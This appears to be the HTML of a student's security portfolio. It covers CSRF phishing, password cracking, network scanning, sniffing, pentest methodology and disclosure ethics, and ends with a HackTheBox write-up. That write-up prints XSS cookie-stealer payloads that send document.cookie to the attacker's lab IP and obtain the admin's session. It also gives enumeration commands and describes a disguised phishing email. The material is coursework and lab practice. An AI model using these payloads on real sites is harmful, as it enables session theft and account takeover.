          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
